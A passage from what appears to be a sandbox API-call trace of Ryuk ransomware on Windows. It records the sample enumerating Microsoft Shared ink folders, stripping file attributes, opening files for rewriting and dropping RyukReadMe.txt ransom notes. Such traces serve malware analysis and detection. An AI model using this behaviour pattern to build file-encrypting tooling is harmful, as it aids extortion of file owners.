hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.668] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.668] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.668] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml", dwFileAttributes=0x80) returned 0 [0131.668] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.668] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.668] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.668] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.668] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.669] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml", dwFileAttributes=0x80) returned 0 [0131.669] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.669] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.669] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.669] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.669] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.669] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", dwFileAttributes=0x80) returned 0 [0131.670] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.670] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.670] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.670] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.670] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.670] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.670] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", dwFileAttributes=0x80) returned 0 [0131.670] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.671] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.671] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.671] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.671] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.671] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml", dwFileAttributes=0x80) returned 0 [0131.671] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.671] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.671] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.671] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.671] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.672] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml", dwFileAttributes=0x80) returned 0 [0131.672] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.672] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.672] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.672] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.672] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.672] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml", dwFileAttributes=0x80) returned 0 [0131.673] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.673] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.673] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.673] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.673] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.673] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml", dwFileAttributes=0x80) returned 0 [0131.673] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.673] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.674] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.674] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.674] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.674] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml", dwFileAttributes=0x80) returned 0 [0131.674] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.674] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.674] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.674] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.674] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.674] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml", dwFileAttributes=0x80) returned 0 [0131.675] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.675] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.675] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.675] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.675] SetLastError (dwErrCode=0x0) [0131.675] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.675] GetLastError () returned 0x5 [0131.675] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.675] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.675] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.675] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.675] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.675] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.676] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.676] SetLastError (dwErrCode=0x0) [0131.676] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.676] GetLastError () returned 0x5 [0131.676] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.676] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.676] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.676] SetLastError (dwErrCode=0x0) [0131.676] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.676] GetLastError () returned 0x5 [0131.676] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.676] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.676] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.676] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.676] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.676] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.676] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.677] SetLastError (dwErrCode=0x0) [0131.677] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.677] GetLastError () returned 0x5 [0131.677] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.677] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.677] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.677] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.677] SetLastError (dwErrCode=0x0) [0131.677] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.677] GetLastError () returned 0x5 [0131.677] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.677] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.677] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.677] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.677] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.677] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.677] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.677] SetLastError (dwErrCode=0x0) [0131.678] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.678] GetLastError () returned 0x5 [0131.678] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.678] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.678] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.678] SetLastError (dwErrCode=0x0) [0131.678] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.678] GetLastError () returned 0x5 [0131.678] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.678] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.678] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.679] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.679] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.679] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.679] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.679] SetLastError (dwErrCode=0x0) [0131.679] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.679] GetLastError () returned 0x5 [0131.679] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.679] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.679] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.679] SetLastError (dwErrCode=0x0) [0131.679] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.679] GetLastError () returned 0x5 [0131.679] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.680] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.680] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.680] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.680] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.680] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.680] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.680] SetLastError (dwErrCode=0x0) [0131.680] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.680] GetLastError () returned 0x5 [0131.680] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.680] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.680] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.680] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.680] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.680] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.680] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.680] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.680] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.680] SetLastError (dwErrCode=0x0) [0131.680] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.681] GetLastError () returned 0x5 [0131.681] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.681] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.681] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.681] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.681] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.681] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.681] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.681] SetLastError (dwErrCode=0x0) [0131.681] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.681] GetLastError () returned 0x5 [0131.681] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.681] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.681] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.681] SetLastError (dwErrCode=0x0) [0131.681] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.681] GetLastError () returned 0x5 [0131.682] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.682] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.682] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.682] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.682] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.682] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.682] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.682] SetLastError (dwErrCode=0x0) [0131.682] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nl-NL\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.682] GetLastError () returned 0x5 [0131.682] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.682] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.682] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.682] SetLastError (dwErrCode=0x0) [0131.682] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.682] GetLastError () returned 0x5 [0131.682] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.682] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.683] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\pl-PL\\*.*", 